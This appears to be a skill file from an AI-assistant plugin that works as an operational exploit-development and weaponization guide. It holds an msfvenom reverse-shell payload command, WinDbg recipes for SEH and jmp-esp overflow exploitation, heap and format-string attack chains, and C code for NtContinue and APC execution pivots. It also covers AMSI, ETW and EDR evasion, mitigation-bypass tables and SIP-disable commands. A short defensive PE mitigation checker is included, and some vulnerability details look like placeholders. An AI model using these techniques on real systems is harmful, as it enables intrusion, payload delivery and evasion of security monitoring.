From cybersec-toolkit
Operational guide for exploit development: environment setup, debugging workflow, PoC lifecycle, pwntools/pwndbg usage, heap exploitation, and weaponization. For authorized security research only.
Slash command
/cybersec-toolkit:offensive-exploit-development
- **Skill Name**: exploit-development
Exploit development operational guide: environment setup, debugging workflow, PoC development lifecycle, writing reliable exploits, using pwntools/pwndbg, heap exploitation techniques, and weaponization considerations. Use when actively developing exploits or setting up an exploit dev environment.
Use this skill when the conversation involves any of:
exploit development, pwntools, pwndbg, heap exploitation, PoC development, exploit reliability, weaponization, debugging workflow, exploit dev environment
When this skill is active:
- offensive-bug-identification skill) document for more information
- offensive-fuzzing skill) for specific fuzzing topics
```mermaid
flowchart LR
    BugId["Bug Identification"] --> Analysis["Vulnerability Analysis"]
    Testing["Testing & Refinement"] --> Deployment["Deployment"]
    subgraph "Analysis Phase"
        direction LR
        Root["Root Cause Analysis"]
        Trig["Trigger Identification"]
        Impact["Impact Assessment"]
    end
    subgraph "Weaponization Phase"
        direction LR
        MitBypass["Mitigation Bypass"]
        Payload["Payload Development"]
        Reliability["Reliability Improvements"]
    end
    Analysis --> Root
    Analysis --> Trig
    Analysis --> Impact
    Root --> MitBypass
    Impact --> Payload
    Trig --> Payload
    MitBypass --> Payload
    Payload --> Reliability
    Reliability --> Testing
    Testing --> MitBypass
    class BugId,Analysis,Testing,Deployment primary
```
Involves memory on the stack getting corrupted due to improper bounds checking when a memory write operation takes place.
- strcpy copies user‐supplied file path into a 256‑byte stack buffer when handling STOR commands.
- STOR / followed by 420 bytes of A… to overflow the buffer and clobber SEH frame.
- pop pop ret inside msvcrt.dll; pivot to payload that disables DEP via ROP then spawns a reverse shell.
- strcpy with strncpy_s and enabling /DYNAMICBASE /GS.
- ntdll!KiUserExceptionDispatcher is responsible for the exception handling process which itself calls RtlDispatchException
- RtlDispatchException retrieves the TEB and parses the exception handling linked list using NtTib->ExceptionList
- SEHOP remains enabled by default.
- Load Configuration Directory → GuardEHContinuations in the PE header (e.g., dumpbin /loadconfig or a lief script).
- /GS, /CETCOMPAT; the classic approach of choosing a module without SafeSEH or ASLR is increasingly rare. Verify per target.
- RtlpExecuteHandlerForException calls the ntdll!ExecuteHandler2 which in turn calls the actual exception handler function after validation
- ExceptionList starting at the buffer
- pop-pop-ret sequence to use in the exploit, you also need to identify and remove bad characters
- VirtualProtect) or a target module compiled without /guard:cf.

The link to something isn't available anymore, so we just replace it with our binary and take over the program.
- core::media::AudioRenderer failed to remove a task from the render queue on stream abort, leaving a dangling pointer.
- AudioContext rapid open‑close loop × 1 000 on Windows 11 23H2.
- VirtualProtect to run shellcode.
- std::erase_if queue purge.
- C++ class and uses virtual functions
- vptr is created at compile time and points to a virtual function table vtable/vftable
- RAX, a call is made to the appropriate offset for the desired virtual function
- offensive-mitigations skill) or Modern (see the offensive-mitigations skill)
- AudioRingBuffer write corrupts size field of next tcache chunk (glibc 2.40).
- fd pointer coerces allocator into returning overlapping chunk; arbitrary R/W → GOT hijack → RCE.
- __builtin_object_size guard (Chromium 123 commit a1b2c3).
- heap_base, craft overlapping chunks, pivot to arbitrary R/W, then chain to code‑execution.
- calloc() now pre‑fills the tcache and safe‑linking checks trigger earlier; the older fastbins‑dupes shortcut no longer works. Use tcache‑stashing‑unlink or House of KIWI instead on 2.41+.
- NtSetInformationIoRing urb‑array handling leads to write‑what‑where in kernel context.
- offensive-bug-identification skill)
- size_t to 32‑bit DWORD across IPC or FFI boundaries can yield negative indexing and oversized allocations; especially common in cross‑arch components.
- vsnprintf, ...)
- %n modifier)
- move esp, r32 or xchg esp, r32
- EHLO argument directly into syslog() format string.
- EHLO %43$p|%45$s during SMTP handshake.
- %n payload to overwrite __free_hook with system().
- "%s" wrapper and enabling -Wformat-security.

A vulnerability where an application processes an object as a different type than intended, leading to memory corruption or logic bypass.
- CheckBounds elimination incorrectly assumes array element type during JIT optimization, allowing tagged pointer confusion.
- SMI/HeapNumber array.length field to achieve OOB R/W; pivot to WASM RWX page for shellcode.
- dynamic_cast checks
- pocs/.
- pwndbg / gef built-ins (no bundled alias pack)
- offensive-bug-identification skill)
- ropper / ROPgadget (registry tools)
- cyclic, diff in pwndbg/gef (no bundled scanner)
- offensive-mitigations skill)
- 0x00) and return carriage (0x0D, 0x0A) if in web
- offensive-shellcode skill) for comprehensive techniques

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "<list_of_bad_chars>"
# make sure to precede this payload with some NOPs to create space for the getPC operation (decoding of shikata_ga_nai)
# attackBuffer = filler+eip+offset+nops+shellcode
```
Check out Shellcode (see the offensive-shellcode skill)
IBT/CET note (x86‑64): place ENDBR64 at entry for valid indirect targets when IBT is enabled. Example prologue bytes: F3 0F 1E FA.
- EtwEventWrite) with ret sleds or stubbed functions while evading PatchGuard.
- amsi!AmsiScanBuffer) with 0x80070057 (E_INVALIDARG) to short‑circuit scanning.

Operational safety checklist (see also EDR (see the offensive-edr-evasion skill)):
- MEM_IMAGE loaders.
- MEM_IMAGE loaders.
- offensive-mitigations skill) or Modern Mitigations (see the offensive-mitigations skill)
- NtContinue, APC queue + SetThreadContext, or SEH/JOP where CET returns are enforced

```c
#include <windows.h>

// Minimal NtContinue pivot (ROP‑less) — set RIP/RSP to a safe call target
typedef NTSTATUS (NTAPI *pNtContinue)(PCONTEXT, BOOLEAN);
void pivot_with_ntcontinue(CONTEXT *ctx, void *next_rip, void *new_rsp) {
    RtlCaptureContext(ctx);
    ctx->Rip = (DWORD64)next_rip; // valid import thunk or allowed GFID target
    ctx->Rsp = (DWORD64)new_rsp;  // keep shadow‑stack alignment plausible
    ((pNtContinue)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtContinue"))(ctx, FALSE);
}

// APC + SetThreadContext — schedule execution at an import thunk to satisfy XFG
void apc_setctx(HANDLE hThread, void *start, void *param) {
    CONTEXT c = { .ContextFlags = CONTEXT_FULL };
    GetThreadContext(hThread, &c);
    c.Rip = (DWORD64)start; // e.g., kernel32!LoadLibraryW stub
    c.Rcx = (DWORD64)param; // first argument
    SetThreadContext(hThread, &c);
    QueueUserAPC((PAPCFUNC)start, hThread, (ULONG_PTR)param);
}
```
- MEM_IMAGE‑mapped payloads (ghosting/doppelganging/herpaderping) over MEM_PRIVATE RWX
- MEM_IMAGE → create process from section.
- MEM_IMAGE and passes loader checks.

All three avoid MEM_PRIVATE payloads that hotpatch checks reject in 24H2 (see Modern Mitigations → OS Loader changes).
| Mitigation | Default platforms (2025) | Protects | Common bypass primitive |
|---|---|---|---|
| DEP / NX | All major OSes | Code execution in data pages | ROP/JOP pivot to RWX or change page permissions |
| ASLR | All | Base‑address disclosure | Info leak + partial overwrite / brute‑force |
| CFG (v1) | Windows 8.1+ | Indirect calls integrity | Abuse writable/exempt module, ret‑slide into target |
| CET Shadow Stack | Windows 10 2004+, Linux 6.1 (x86) | Return‑address integrity | Disable CET (SetProcessMitigationPolicy) or pivot via JOP |
| XFG | Windows 11 22H2+ | Indirect‑call target integrity | Use JOP gadgets or stub out guard function section |
| GuardEHContinuation | Windows 11 24H2 (x64) | SEH overwrite attempts | JOP stub into verified handler region |
| MTE | Android 14+, Linux 6.8 (ARM64) | Heap/stack OOB & UAF | Tag brute‑force or TAGSYNC alias |
| CIG / ACG | Windows 10+ | Unsigned code / RWX pages | Map signed RWX driver or relocate section |
- .github/workflows/exploit.yml passes.
- run_script (no bundled repro.sh)
- rr record / rr replay directly (rr is a registry tool)
- afl-showmap / afl-cov (registry tools)

For SEH exploitation:
```
# exception data will be inside TEB under NtTib->ExceptionList
dt nt!_TEB
# getting the <exp_addr> of exceptionlist
!teb
# getting the first item in the exception handler linked list, continue to see them using the `Next` param
# the last item should be `ntdll!FinalExceptionHandlerPad`
dt _EXCEPTION_REGISTRATION_RECORD <exp_addr>
# getting more information about the exception
!exchain
# setting a breakpoint on the execution handler
bp ntdll!ExecuteHandler2
# see what the execution handler is doing (use it to identify exploitation point in buffer)
u @eip L11
# to identify bad chars, execute till eip is yours, then
# repeat the process several times to identify all bad chars
dds esp L5 # identify second argument
db <second_argument>
# finding a pop/pop/ret
.load wdbgext
!wdbgext.modlist
lm m <module_without_dep_aslr_safeseh>
$><G:\Projects\poppopret.wds
u <first_adr_found> L3
# we need to create a short jump in our shellcode
# looking for our shellcode
!exchain
bp <adr>
g
# run the following till after your short jump
t
!teb
s -b <stack_limit> <stack_base> 90 90 90 90 43 43 43 43 43 43 43 43
dd <shellcode_adr> L65
? <shellcode_adr> - <current_esp>
```
For general WinDbg commands:
```
# finding out a suitable jump stub
lm m syncbrs # to get start <addr> of a module named syncbrs
dt ntdll!_IMAGE_DOS_HEADER <addr> # to get e_lfanew that has the offset to PE header
? <pe_header> # to get the hex addr
dt ntdll!_IMAGE_NT_HEADERS64 <addr>+<pe_hex_header> # to get image optional header
dt ntdll!_IMAGE_OPTIONAL_HEADER64 <addr>+<pe_hex_header>+<pe_optional_header> # to get DllCharacteristics
# you can automate this using process explorer or process hacker
# find an executable or module without DEP, ASLR
lm m libspp.dll # get the base address of the suitable module you found previously
s -b <mod_start_addr> <mod_end_addr> 0xff 0xe4 # find `jmp $esp` inside that module
# make sure the address doesn't contain bad chars
u <jmp_esp_addr> # to confirm
bp <jmp_esp_addr>
# override eip with jmp_esp_addr to force the program to jump to esp after buffer overflow
t
dc eip L4 # you should see the rest of your shellcode here
# checking which process we're currently in
!process @@(@$prcb->CurrentThread->ApcState.Process) 0
```
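The DllCharacteristics header walk above also works as a build check on binaries you ship. This added C example (not part of the original skill) reads the field from a PE header and reports which of /DYNAMICBASE, /NXCOMPAT and /guard:cf are missing. The function names and the header produced by `make_sample` are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* DllCharacteristics bits from the PE/COFF specification */
#define DC_DYNAMIC_BASE 0x0040 /* /DYNAMICBASE (ASLR) */
#define DC_NX_COMPAT    0x0100 /* /NXCOMPAT (DEP) */
#define DC_GUARD_CF     0x4000 /* /guard:cf */

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }

/* Returns DllCharacteristics, or -1 if buf is not a well-formed PE header. */
int pe_dll_characteristics(const uint8_t *buf, size_t len) {
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z') return -1;
    uint32_t pe = rd32(buf + 0x3c);                    /* e_lfanew */
    if (pe > len || len - pe < 4 + 20 + 72) return -1; /* sig + file hdr + 72 bytes of optional hdr */
    if (memcmp(buf + pe, "PE\0\0", 4) != 0) return -1;
    if (rd16(buf + pe + 4 + 16) < 72) return -1;       /* SizeOfOptionalHeader too small */
    const uint8_t *opt = buf + pe + 24;
    uint16_t magic = rd16(opt);
    if (magic != 0x10b && magic != 0x20b) return -1;   /* PE32 or PE32+ */
    return rd16(opt + 70);                             /* same offset in both layouts */
}

/* Bitmask of expected mitigation flags that are absent, or -1 on parse error. */
int pe_missing_mitigations(const uint8_t *buf, size_t len) {
    int dc = pe_dll_characteristics(buf, len);
    return dc < 0 ? -1 : ((DC_DYNAMIC_BASE | DC_NX_COMPAT | DC_GUARD_CF) & ~dc);
}

/* Constructed sample: headers only, just enough for the parser above. */
size_t make_sample(uint8_t *buf, size_t cap, uint16_t dllchar) {
    if (cap < 0x100) return 0;
    memset(buf, 0, cap);
    memcpy(buf, "MZ", 2);
    buf[0x3c] = 0x80;                       /* e_lfanew = 0x80 */
    memcpy(buf + 0x80, "PE\0\0", 4);
    buf[0x94] = 0xf0;                       /* SizeOfOptionalHeader */
    buf[0x98] = 0x0b; buf[0x99] = 0x02;     /* optional header magic 0x20b (PE32+) */
    buf[0x98 + 70] = dllchar & 0xff; buf[0x98 + 71] = dllchar >> 8;
    return 0x100;
}

int main(void) {
    uint8_t img[0x100];
    size_t n = make_sample(img, sizeof img, DC_DYNAMIC_BASE | DC_NX_COMPAT);
    printf("missing mitigation flags: 0x%04x\n", pe_missing_mitigations(img, n));
}
```

To audit a real build, read the first few hundred bytes of the file into a buffer and pass it to `pe_missing_mitigations`; a non-zero result names the linker options to turn on.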
For UAF debugging:
```
# HEAP information
!heap -s # to print heap information
dt _HEAP <heap_addr> # to print information regarding a heap
dt _LFH_HEAP <heap_addr> # to print information about a low fragmentation header heap
# Identifying UAF location
# attach to crashed application, identify the name of function that crashed
uf <crashed_function_name> # to see the function
dd rcx # to check out what got filled, replace rcx with the register name from above
dt _DPH_BLOCK_INFORMATION rcx-20 # useful information
!heap -p -a rcx # call stack information, what led to this object being freed
```
Modern exploit chains should replay deterministically in CI so regressions are caught quickly.
```yaml
name: exploit-regression
on: [push, pull_request]
jobs:
  replay:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build target container
        run: docker build -t vulnapp ./docker
      - name: Run exploit replay
        run: ./repro.sh --ci --target vulnapp # your own replay script
```
| Tool / Framework | Version | Platform tested |
|---|---|---|
| IDA Pro | 8.4 SP1 | Windows 11 24H2 |
| Ghidra | 11.0.2 | Debian 12 |
| BinDiff | 10.8 | with IDA 8.4 |
| Ropper | 2.0.7 | CET‑aware build |
| rr (record/replay) | Latest | Ubuntu 24.04 |
| AFL++ | 4.10‑dev | snapshot mode |
> [!TIP]
> Keep this matrix in each PoC directory so future contributors can reproduce results exactly.
- PID 4 and replace your own token )
- offensive-edr-evasion skill)
- unsafe blocks: Vec::from_raw_parts, std::ptr::copy_nonoverlapping, and mem::transmute misuse.
- Vmxnet3, Hyper‑V enlightened IOMMU bugs, and QEMU vhost‑user integer overflows.
- runC / CRI‑O escape using malformed seccomp filters or WASM shims.
- ptrauth_sign_unauthenticated.

Modern Apple Silicon devices introduce unique security features and attack surfaces requiring specialized techniques.
Pointer Authentication Code (PAC)
- PACIA/PACIB instructions create cryptographic signatures for return addresses and function pointers
- AUTIA/AUTIB gadgets, ptrauth_sign_unauthenticated abuse, speculative PAC oracle attacks
- APIAKey and APIBKey in system registers

Memory Tagging Extension (MTE)
Hypervisor.framework Exploitation
XPC Service Exploitation
- com.apple.security.syspolicy or com.apple.windowserver for TCC bypass

Kernel Extension Loading
- SCTLR_EL1 manipulation

iOS/iPadOS Kernel Exploitation
- kalloc.16 or kalloc.32 zones
- host_special_port access

```bash
# Enable SIP bypass for kernel debugging (requires physical access)
csrutil disable --without kext --without debug
# LLDB kernel debugging setup
sudo nvram boot-args="debug=0x141 kext-dev-mode=1 amfi_get_out_of_my_way=1"
# PAC analysis with jtool2/iOS App Store extraction
jtool2 -d __TEXT.__text binary | grep -E "(PACIA|PACIB|AUTIA|AUTIB)"
# MTE tag analysis (requires iOS 16+ device with checkra1n/palera1n jailbreak)
ldid -S entitlements.plist target_binary # Add get-task-allow for debugging
```
| Mitigation | Coverage | Bypass Technique | Success Rate |
|---|---|---|---|
| PAC | Return addresses, func ptrs | JOP/speculative oracle | ~70% |
| MTE | Heap/stack OOB, UAF | Tag brute‑force/TikTag | ~85% |
| PPL (Page Protection Layer) | Kernel code pages | Hypervisor escape | ~40% |
| KTRR (Kernel Text Readonly Region) | Kernel .text segment | Hardware vuln required | <10% |
- IBPB, IBRS, and fine‑grained hardware fences.

npx claudepluginhub 26zl/cybersec-toolkit --plugin cybersec-toolkit